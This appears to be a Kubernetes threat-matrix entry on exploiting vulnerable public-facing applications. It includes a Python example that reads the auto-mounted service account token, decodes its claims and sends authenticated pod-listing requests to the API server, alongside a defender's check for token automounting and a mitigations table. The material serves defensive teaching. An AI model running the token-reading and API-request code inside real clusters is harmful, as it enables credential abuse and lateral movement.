Application vulnerability
Info
ID: MS-TA9004
Tactic: Initial Access
MITRE technique: T1190
Running a public-facing vulnerable application in a cluster can enable initial access to the cluster. A container that runs an application with a remote code execution (RCE) vulnerability may be exploited to run attacker-controlled code inside that container. If a service account token is mounted into the container (the default behavior in Kubernetes, at /var/run/secrets/kubernetes.io/serviceaccount/token), the attacker can use it to send authenticated requests to the API server with whatever permissions RBAC grants that service account. Setting automountServiceAccountToken: false on the pod or on the service account prevents the token from being mounted where the application does not need it.
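The following is an added example, not code from the Threat Matrix page, showing both sides of the technique: what an attacker who has code execution inside a container does with the auto-mounted token (read it, decode its claims to learn the identity, and send an authenticated request to the in-cluster API server), and the check a defender runs over pod objects to find pods that will receive a token. It assumes the standard token mount path and the in-cluster endpoint https://kubernetes.default.svc; the JWT, the pod objects and the temporary mount directory are constructed for illustration and are not real cluster data.

```python
"""Added example (not from the Threat Matrix page): service account token
abuse after RCE in a container, and the defender's automount check.
Assumes Kubernetes' default token mount path and in-cluster API endpoint.
The sample token, pods and mount directory below are constructed."""
import base64
import json
import os
import ssl
import tempfile
import urllib.request

SA_DIR = "/var/run/secrets/kubernetes.io/serviceaccount"
API_SERVER = "https://kubernetes.default.svc"


def read_sa_credentials(sa_dir=SA_DIR):
    """Return token, namespace and CA path if a token is mounted, else None.
    None is what the attacker finds when automountServiceAccountToken is false."""
    token_path = os.path.join(sa_dir, "token")
    if not os.path.isfile(token_path):
        return None
    with open(token_path) as f:
        token = f.read().strip()
    ns_path = os.path.join(sa_dir, "namespace")
    namespace = open(ns_path).read().strip() if os.path.isfile(ns_path) else "default"
    return {"token": token, "namespace": namespace,
            "ca_path": os.path.join(sa_dir, "ca.crt")}


def decode_jwt_claims(token):
    """Decode the JWT payload without verifying the signature: the attacker
    only wants to learn which identity (sub) the token represents."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore base64url padding
    return json.loads(base64.urlsafe_b64decode(payload))


def build_api_request(creds, path):
    """Build the bearer-authenticated request a compromised container sends."""
    req = urllib.request.Request(API_SERVER + path)
    req.add_header("Authorization", "Bearer " + creds["token"])
    return req


def list_pods(creds):
    """Live call, only meaningful inside a cluster: list pods in our namespace.
    Whether it succeeds depends on the RBAC bindings of the service account."""
    ctx = ssl.create_default_context(cafile=creds["ca_path"])
    req = build_api_request(creds, "/api/v1/namespaces/%s/pods" % creds["namespace"])
    with urllib.request.urlopen(req, context=ctx) as resp:
        return json.load(resp)


def pod_mounts_token(pod, service_account=None):
    """Defender's check over `kubectl get pod -o json` objects: the pod-level
    automountServiceAccountToken overrides the ServiceAccount's; default is True."""
    spec = pod.get("spec", {})
    if "automountServiceAccountToken" in spec:
        return bool(spec["automountServiceAccountToken"])
    if service_account and "automountServiceAccountToken" in service_account:
        return bool(service_account["automountServiceAccountToken"])
    return True


def _b64url(data):
    return base64.urlsafe_b64encode(json.dumps(data).encode()).decode().rstrip("=")


# Constructed, unsigned bound-token lookalike (the signature part is a placeholder).
SAMPLE_TOKEN = ".".join([
    _b64url({"alg": "RS256", "kid": "constructed"}),
    _b64url({"iss": "https://kubernetes.default.svc.cluster.local",
             "sub": "system:serviceaccount:webapp:default",
             "kubernetes.io": {"namespace": "webapp",
                               "pod": {"name": "web-7d9f"},
                               "serviceaccount": {"name": "default"}}}),
    "c2lnbmF0dXJl",
])

# Constructed pod objects: default settings versus the hardened spec.
VULNERABLE_POD = {"metadata": {"name": "web"},
                  "spec": {"serviceAccountName": "default",
                           "containers": [{"name": "app", "image": "web:1.0"}]}}
HARDENED_POD = {"metadata": {"name": "web"},
                "spec": {"serviceAccountName": "default",
                         "automountServiceAccountToken": False,
                         "containers": [{"name": "app", "image": "web:1.0"}]}}


def make_constructed_mount():
    """Create a temporary directory that looks like the token mount (constructed)."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "token"), "w") as f:
        f.write(SAMPLE_TOKEN + "\n")
    with open(os.path.join(d, "namespace"), "w") as f:
        f.write("webapp\n")
    return d


if __name__ == "__main__":
    creds = read_sa_credentials(make_constructed_mount())
    print("identity:", decode_jwt_claims(creds["token"])["sub"])
    print("vulnerable pod mounts token:", pod_mounts_token(VULNERABLE_POD))
    print("hardened pod mounts token:", pod_mounts_token(HARDENED_POD))
```

Inside a real cluster, `list_pods(read_sa_credentials())` is the attacker's first probe; a 403 from the API server means the token exists but the service account has no useful bindings, while a missing token file means automounting was disabled. The `pod_mounts_token` check is meant to be run over every pod and its ServiceAccount object so that pods which get a token without needing one can be fixed.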
Mitigations
ID | Mitigation | Description |
---|---|---|
MS-M9005 | Image Assurance Policy | Ensure that only images that passed the security compliance policies are pushed to registries and deployed to Kubernetes clusters. |
MS-M9007 | Network Intrusion Prevention | Use network intrusion prevention to detect and block exploitation attempts against public-facing applications. |